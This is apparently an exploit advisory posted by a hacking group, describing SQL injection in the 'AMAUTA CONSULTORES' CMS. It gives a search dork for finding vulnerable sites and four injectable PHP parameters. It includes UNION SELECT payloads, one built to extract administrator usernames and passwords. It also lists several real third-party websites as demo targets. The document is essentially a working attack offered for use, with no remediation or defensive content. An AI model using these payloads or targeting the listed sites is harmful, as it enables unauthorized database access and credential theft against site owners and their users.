######################################################################################## # # # Exploit Title : AMAUTA CONSULTORES CMS SQL Injection Vulnerability # # # # Author : Secure-Land Security Team # # # # Discovered By : farbodmahini # # # # Home : Secure-Land.net # # # # Vendor : www.amautaperu.com # # # # Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com # # # # Security Risk : High # # # # DorK : "Powered by AMAUTA CONSULTORES S.A.C" # # # # # ######################################################################################## # # # Expl0iT: # # # # http://[TarGeT]/node_events.php?id=[sqli] # # http://[TarGeT]/node_news.php?idnew=[sqli] # # http://[TarGeT]/node.php?id=[sqli*] # # http://[TarGeT]/photos.php?id=[*sqli] # # # # [sqli*] : # # # # -9999+Union+select+1,2,3,version()-- # # # # [*sqli] : # # # # -1+union+select+1,2,group_concat(user_name,0x3a,user_password)+from+administrators--# # # # # # Demo : # # # # http://perupromotions.co.uk/photos.php?id=[*sqli] # # http://www.petaliecapricci.it/index.asp?p=credits' # # http://www.teknosbologna.it/index.asp?p=credits' # # http://www.mydylandog.it/index.asp?p=credits' # # # ######################################################################################## # # # Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us # # # ######################################################################################## # # # Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id # # # ########################################################################################